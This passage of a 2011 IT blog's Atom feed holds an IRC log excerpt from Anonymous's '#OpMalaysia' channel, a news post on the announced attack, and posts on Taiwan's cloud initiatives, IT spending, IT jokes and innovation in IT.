/&gt;[04:25] &amp;lt;@joepie91&amp;gt; 4.2.2.3&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 4.2.2.4&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 4.2.2.5&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 4.2.2.6&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; =&amp;gt; Service provider: ScrubIt&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; Public dns server address:&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 67.138.54.100&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; 207.225.209.66&lt;br /&gt;[04:25] &lt;kageyama_o_o&gt; gr4ci, open source is not necessarily free.. it just open source&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; set these IPs as your nameservers&lt;br /&gt;[04:25] &amp;lt;@joepie91&amp;gt; lemme get a guide&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;[04:39] &amp;lt;%Effexor&amp;gt; Title: #OpMalaysia Anonymos (at pastehtml.com)&lt;br /&gt;[04:39] &lt;playboy&gt; Ebb: I know :D &lt;br /&gt;[04:39] &lt;tm_press&gt; gr4c1 - mind to share with us?&lt;br /&gt;[04:39] &lt;ebb&gt; lmao! cheeky&lt;br /&gt; 10[04:40] * Joins: d3ck4 (d3ck4@AN-nae.cqh.cffsad.IP)&lt;br /&gt;[04:40] &lt;serverstuff&gt; what happen to cimb?&lt;br /&gt; 10[04:40] * Joins: zer03 (zer03@AN-g0j.vsa.mpq0id.IP)&lt;br /&gt;[04:40] &lt;komkom&gt; but they dont know that irc also is a place to people exchange idea&lt;br /&gt;[04:40] &lt;cornelius&gt; but dont forget. a nornal practice of a hacker is performing ddos as the last option&lt;br /&gt;#----- REMOVED -----#&lt;br /&gt;&lt;/cornelius&gt;&lt;/komkom&gt;&lt;/serverstuff&gt;&lt;/ebb&gt;&lt;/tm_press&gt;&lt;/playboy&gt;&lt;/kageyama_o_o&gt;&lt;/cornelius&gt;&lt;/komkom&gt;&lt;/gr4c1&gt;&lt;/alice&gt;&lt;/komkom&gt;&lt;/w33dy&gt;&lt;/bijan&gt;&lt;/vv0rm6an0n&gt;&lt;/vv0rm6an0n&gt;&lt;/cornelius&gt;&lt;/vv0rm6an0n&gt;&lt;/vv0rm6an0n&gt;&lt;/edrick&gt;&lt;/agobot&gt;&lt;/emkem&gt;&lt;/tm_press&gt;&lt;/gr4c1&gt;&lt;/coffee&gt;&lt;/ebb&gt;&lt;/fenris&gt;&lt;/morrissey&gt;&lt;/afiq27&gt;&lt;/root_&gt;&lt;/anonysocool&gt;&lt;/jarkoo&gt;&lt;/annoycyber&gt;&lt;/ded1&gt;&lt;/arthas_1203&gt;&lt;/vex&gt;&lt;/annoycyber&gt;&lt;/d-mist&gt;&lt;/mr_hollow&gt;&lt;/annoycyber&gt;&lt;/annoycyber&gt;&lt;/dark_night&gt;&lt;/dark_night&gt;&lt;/hack1&gt;&lt;/hack1&gt;&lt;/anon_tim&gt;&lt;/annoycyber&gt;&lt;/govt&gt;&lt;/annoycyber&gt;&lt;/c0smic&gt;&lt;/xumarix&gt;&lt;/novalis&gt;&lt;/weezas&gt;&lt;/fisau&gt;&lt;/fisau&gt;&lt;/wabbit&gt;&lt;/anon_tim&gt;&lt;/haizzzz&gt;&lt;/nemoegg&gt;&lt;/korapted&gt;&lt;/morrissey&gt;&lt;/ping19999&gt;&lt;/ping19999&gt;&lt;/korapted&gt;&lt;/imseeker32&gt;&lt;/mib_ajrsao&gt;&lt;/operationlol_&gt;&lt;/imseeker32&gt;&lt;/xumarix&gt;&lt;/xumarix&gt;&lt;/it_bandit&gt;&lt;/it_bandit&gt;&lt;/imseeker32&gt;&lt;/anon_tim&gt;&lt;/outlawz&gt;&lt;/bedanc&gt;&lt;/d3ck4&gt;&lt;/d&gt;&lt;/f4s7&gt;&lt;/bedanc&gt;&lt;/mech&gt;&lt;/bedanc&gt;&lt;/hitbsecphotos&gt;&lt;/outlawz&gt;&lt;/taeyeon&gt;&lt;/effexor&gt;&lt;/effexor&gt;&lt;/jin_manusia&gt;&lt;/malaysiancitizenlol&gt;&lt;/kamate&gt;&lt;/joepie91&gt;&lt;/extrablack&gt;&lt;/pudgetta&gt;&lt;/al-pacino&gt;&lt;/mech&gt;&lt;/morrissey&gt;&lt;/extrablack&gt;&lt;/bishop&gt;&lt;/hunter&gt;&lt;/wabbit&gt;&lt;/sht_tha_fck_up&gt;&lt;/bishop&gt;&lt;/llquor&gt;&lt;/wabbit&gt;&lt;/supportopmalaysia&gt;&lt;/bishop&gt;&lt;/supportopmalaysia&gt;&lt;/taeyeon&gt;&lt;/bersih&gt;&lt;/taeyeon&gt;&lt;/annoycyber&gt;&lt;/meraki&gt;&lt;/payik&gt;&lt;/payik&gt;&lt;/payik&gt;&lt;/payik&gt;&lt;/hitbsecphotos&gt;&lt;/vv6&gt;&lt;/vv6&gt;&lt;/vv6&gt;&lt;/mib_sleepy&gt;&lt;/vv6&gt;&lt;/vv6&gt;&lt;/sn0rtdogg&gt;&lt;/admin&gt;&lt;/f4s7&gt;&lt;/sht&gt;&lt;/f4s7&gt;&lt;/mib_zhwqhv&gt;&lt;/admin&gt;&lt;/vv6&gt;&lt;/vv6&gt;&lt;/vv6&gt;&lt;/vv6&gt;&lt;/vv6&gt;&lt;/mrcuteo&gt;&lt;/susu&gt;&lt;/waklu&gt;&lt;/rylai&gt;&lt;/waklu&gt;&lt;/waklu&gt;&lt;/susu&gt;&lt;/againandagain&gt;&lt;/coldblood&gt;&lt;/mrcuteo&gt;&lt;/xops&gt;&lt;/f4s7&gt;&lt;/antinode&gt;&lt;/sx2&gt;&lt;/mib_jyfiq2&gt;&lt;/kru&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-3116500828392760650?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/3116500828392760650/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=3116500828392760650' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3116500828392760650'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3116500828392760650'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/06/opmalaysia-day-1.html' title='#OpMalaysia - Day 1'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-rpii-cp4kqo/Tfec4VBA1bI/AAAAAAAAAHk/xA8q8aXH72g/s72-c/anonymous-opmalaysia_thumb.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-3267746920099443913</id><published>2011-06-14T10:11:00.002+08:00</published><updated>2011-06-14T10:15:49.156+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Cyber Threats: Operation Malaysia</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blogs.zdnet.com/security/images/hacktivism.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://blogs.zdnet.com/security/images/hacktivism.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;F-Secure Corporation Chief Research Officer,&amp;nbsp;Mikko Hypponen, tweeted about the threat at 4.42am Malaysian time.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The group, which calls itself Anonymous, said it will launch the attack at 7.30pm GMT on Wednesday (3.30am Thursday Malaysian time) and has named it &lt;b&gt;“Operation Malaysia.”&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;The&amp;nbsp;posted a mission statement to Pastebin on June 12 describing the reasoning behind their planned and upcoming attack on official Malaysian government websites. Anonymous warned, &lt;i&gt;“&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;We fear that if you make further decisions to take away human freedom, we [will be] obligated to act fast and have no mercy.”&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Anonymous revealed that target countries are selected based on input from users in those countries, however when asked whether or not there were Anonymous in Malaysia, they responded only that “[We] cannot give you that info.”&amp;nbsp;It posted the threat in a graphic on this &lt;a href="http://i.imgur.com/PTFWh.png"&gt;website&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Anonymous apparently comprises a vast number of hackers in various countries, who have been organised into cells that share common goals. They operate anonymously but in a co-ordinated fashion.&lt;br /&gt;&lt;br /&gt;Reference:&amp;nbsp;&lt;span class="Apple-style-span" style="color: #0000ee;"&gt;&lt;u&gt;theepochtimes&amp;nbsp;&lt;/u&gt;&lt;/span&gt;and &lt;a href="http://thestar.com.my/news/story.asp?file=/2011/6/14/nation/20110614081623&amp;amp;sec=nation"&gt;TheStar Online&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-3267746920099443913?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/3267746920099443913/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=3267746920099443913' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3267746920099443913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3267746920099443913'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/06/cyber-threats-operation-malaysia.html' title='Cyber Threats: Operation Malaysia'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-5376331280350524749</id><published>2011-06-10T17:46:00.000+08:00</published><updated>2011-06-10T17:46:00.613+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cloud Computing'/><title type='text'>Cloud Computing Initiative: TAIWAN</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.windowsfs.com/wp-content/uploads/cloud-computing.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="147" src="http://www.windowsfs.com/wp-content/uploads/cloud-computing.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;As I mentioned on my previous &lt;a href="http://shaolininteger.blogspot.com/2011/06/it-architect-jokes.html"&gt;post&lt;/a&gt;,&amp;nbsp;other things that I think I should share is the&amp;nbsp;Chunghwa Telecom&amp;nbsp;&amp;amp; Chairman of Committee on Cloud Services,&amp;nbsp;Cloud Computing Association in Taiwan,&amp;nbsp;Dr Yen-Sung Lee&lt;br /&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;SVP &amp;amp; COO presentation.&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;He mentioned that, Taiwan government has developed a Cloud Computing Roadmap since January 2010. He said, &lt;i&gt;"it was started with the initiation of the &lt;b&gt;Cloud Computing Organization&lt;/b&gt;, to help cloud computing industries specially in their country."&lt;/i&gt;&amp;nbsp;Now, Taiwan has six (6) Cloud Centers or initiatives:&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;/div&gt;&lt;ol&gt;&lt;li&gt;&lt;b&gt;Cloud Operation Center&lt;/b&gt; - A centralized monitoring, resource provisioning and management facilicities&lt;/li&gt;&lt;li&gt;&lt;b&gt;Cloud Testing Center&lt;/b&gt; - Facilities to provide various test and verification services e.g. stress test, interface test, functional test, security test&lt;/li&gt;&lt;li&gt;&lt;b&gt;Cloud Research &amp;amp; Development Center&lt;/b&gt; - Develop the key technologies of Cloud Computing and collaborate with industries and academic institutes&lt;/li&gt;&lt;li&gt;&lt;b&gt;Cloud Experience Center&lt;/b&gt; - Provide enterprise users experiencing cloud services and technologies in actual&amp;nbsp;environment&lt;/li&gt;&lt;li&gt;&lt;b&gt;Cloud Service Creation Platform&lt;/b&gt; - Build a high-capacity Platform-as-a-Service (PaaS) platform to enrich the software development environment&lt;/li&gt;&lt;li&gt;&lt;b&gt;Innovation and Application Contest&lt;/b&gt; - To encourage innovative service development across Taiwan&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-5376331280350524749?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/5376331280350524749/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=5376331280350524749' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5376331280350524749'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/5376331280350524749'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/06/cloud-computing-initiative-taiwan.html' title='Cloud Computing Initiative: TAIWAN'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-7490353095647443695</id><published>2011-06-08T09:58:00.002+08:00</published><updated>2011-06-08T16:26:25.150+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>IT Spending Decisions Over The Next 12-18 months</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.enterprisestrategygroup.com/media/wordpress/2011/05/NtapParAccelF1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="138" src="http://www.enterprisestrategygroup.com/media/wordpress/2011/05/NtapParAccelF1.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: tahoma; font-size: 14px;"&gt;ESG research indicates that, in 2011, the top two business initiatives that will have the greatest impact on IT spending are cost reduction and business process improvements.&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: tahoma; font-size: 14px;"&gt;Close behind, in the top four is improving business intelligence and delivery of real-time analytics.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: tahoma; font-size: 14px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: tahoma; font-size: 14px;"&gt;Real-time analytics is considered both an operational must-have and a strategic competitive advantage. With such increasing priority, the much-coveted data scientist needs access to a platform that supports data mining and complex analytics to scale; is agile in supporting evolving data types; can ingest massive volumes of new data sets quickly or recover just as quickly should the data load fail; and can present a prototyping environment to test models without breaking the bank. This last requirement is so crucial because, while budgets are growing modestly, IT is still required to do more with less. Once these models have been tested, they must be operationalized so that the business can benefit on a day to day basis. Shifting to a more real-time operational business model means analytics platforms with more advanced data management features as they become systems of record.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: tahoma; font-size: 14px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: tahoma;"&gt;&lt;span class="Apple-style-span" style="font-size: 14px;"&gt;&lt;b&gt;Source:&lt;/b&gt;&amp;nbsp;&lt;a href="http://www.enterprisestrategygroup.com/2011/05/paraccel-padb-and-netapp-san-optimized-solution-high-performance-analytics-with-advanced-data-management-capabilities/?utm_source=ConstantContact&amp;amp;utm_medium=Email&amp;amp;utm_campaign=NewsletterJune11"&gt;ESG&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-7490353095647443695?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/7490353095647443695/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=7490353095647443695' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/7490353095647443695'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/7490353095647443695'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/06/it-spending-decisions-over-next-12-18.html' title='IT Spending Decisions Over The Next 12-18 months'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-3040519682899218652</id><published>2011-06-06T17:32:00.000+08:00</published><updated>2011-06-06T17:32:34.378+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>IT Architect Jokes</title><content type='html'>&lt;a href="http://t3.gstatic.com/images?q=tbn:ANd9GcQTEk58fpiaOhy-AQwyOfQp5A2A5K3Y7bB01FTHPIpl_xLYmZcwqg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="126" src="http://t3.gstatic.com/images?q=tbn:ANd9GcQTEk58fpiaOhy-AQwyOfQp5A2A5K3Y7bB01FTHPIpl_xLYmZcwqg" width="200" /&gt;&lt;/a&gt;Recently, I attended Cloud Computing Conference at Singapore. One interest me is the IASA presentation which I considered as a brilliant jokes.&amp;nbsp;We may not realized this but I think it is a reality.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&lt;i&gt;Anyone who has more than 10 years of IT project implementation experience&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;Has performed various IT roles such as developers, system analyst, project manager, network/server engineer, PMO, CTO, etc&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;Failed in couple of large IT projects and burned millions of dollars without being put to jail&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-3040519682899218652?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/3040519682899218652/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=3040519682899218652' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3040519682899218652'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3040519682899218652'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/06/it-architect-jokes.html' title='IT Architect Jokes'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-2290539885021391400</id><published>2011-01-30T18:19:00.000+08:00</published><updated>2011-01-30T18:19:34.610+08:00</updated><title type='text'>Information Security Architecture</title><content type='html'>Been busy designing Information Security Architecture for some company.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-2290539885021391400?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/2290539885021391400/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=2290539885021391400' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2290539885021391400'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2290539885021391400'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2011/01/information-security-architecture.html' title='Information Security Architecture'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4258336333812836087</id><published>2010-11-23T14:14:00.001+08:00</published><updated>2010-11-23T14:17:16.694+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Stop Killing Innovation</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_Z-tqVTd9fPI/R9-fNYzRCHI/AAAAAAAAAX4/DAaKfx9SC-M/s400/cio-logo_180x109.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_Z-tqVTd9fPI/R9-fNYzRCHI/AAAAAAAAAX4/DAaKfx9SC-M/s400/cio-logo_180x109.gif" /&gt;&lt;/a&gt;&lt;/div&gt;I read an interesting post from &lt;a href="http://www.blogger.com/profile/13512184196416665417"&gt;RICHARD BEJTLICH&lt;/a&gt; that talked about "Innovation". I decided to share his post here, enjoy reading.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;I hear and read a lot about how IT is supposed to innovate to enable "the business." Anytime I see "IT" in one part of a sentence and "the business" in another, a little part of me dies. Somewhere there is a Nirvana where "thought leaders" understand that &lt;b&gt;there is no business&lt;/b&gt; without IT, that &lt;b&gt;IT is as part of the business as the sales person&lt;/b&gt; or factory worker or janitor, and that &lt;b&gt;IT would be better off not constantly justifying its existence&lt;/b&gt; to "the business." But I digress. &lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;I want to address the "innovation" issue in this post. CIO magazine recently published an interview with Vinnie Mirchandani titled Taking Business Risks With Your IT Budget. I liked what Mr Mirchandani had to say, although I'm going to omit his multiple references to "cloud." Instead, consider how he sees innovation in IT:&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;More [CIOs] want to be [innovators], but organizations don’t let them...&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;In the 1980s, we talked about IT as a competitive advantage... In the 1990s, we didn’t hear much of that at all, and IT started reporting to CFOs. In the early 2000s, the CFO made IT a compliance function for auditing and security.&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;We’ve beaten the innovation out of CIOs at many companies. We want them to be risk mitigators, not innovators. People are afraid to be associated with any failure. They buy IT from vendors that are safe choices.&lt;/b&gt; They know they’re overspending, yet they do it anyway...&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;Mr Mirchandani doesn't say this, but he could have also mentioned that many managers expect CIOs to be "productivity engines," meaning they inherently shrink their budget every year. This drives cost reduction as the primary goal for an IT shop -- not innovation. It's like expecting the business development team to concentrate on decreasing the amount of money spent per new customer acquired, while not caring so much on the quantity or quality of the new customers -- if any!&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;So what to do?&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;The best thing they could do is get out from under the CFO. Go to your CEO and say, “I want to report to you.” Make sure the CFO doesn’t stand in the way. Some CIOs will get fired for doing that. Others will get a chance...&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;Cost pressure isn't limited to those who only report to the CFO, but he doesn't address that issue.&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;The shocking thing about corporate IT is that without realizing it, 85 percent to 90 percent of the IT spend is with a vendor, including outsourcers and the staff you buy from them...&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;When you’re spending 90 percent of your money with a vendor, you have only a sliver left for [internal] talent — yet &lt;b&gt;it’s with your own internal talent that you can innovate. There’s very little left for CIOs to innovate with.&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;The more progressive CIOs are saying they’ve overdone it with outsourcing and are starting to hire their own enterprise architects and business analysts and other strategic resources. &lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;To me this is the crux of the issue. Businesses cannot outsource innovation. Businesses can crush innovation pretty easily though.&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;I found one comment he made about the cloud to be very interesting:&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;CIOs resist it. It’s not secure, they say. It’s not always available. CIOs say cloud vendors go down too often.&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;I know CIOs who haven’t run a full disaster-recovery drill for years and turn around and say that the cloud isn’t production-ready.&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;So, my message to readers is this: if cost-out, five nines uptime, outsourced workforces, and other failed strategies are your goal, forget innovation. If you want innovation to thrive, try considering the alternatives. &lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;Source: &lt;a href="http://taosecurity.blogspot.com/"&gt;Richard Blog&lt;/a&gt;&lt;br /&gt;Reference: &lt;a href="http://www.cio.com/article/632224/Taking_Business_Risks_With_Your_IT_Budget?page=2&amp;amp;taxonomyId=3166"&gt;CIO&lt;/a&gt;&amp;nbsp;- Taking Business Risk with Your IT Budget&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4258336333812836087?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4258336333812836087/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4258336333812836087' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4258336333812836087'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4258336333812836087'/><link rel='alternate' 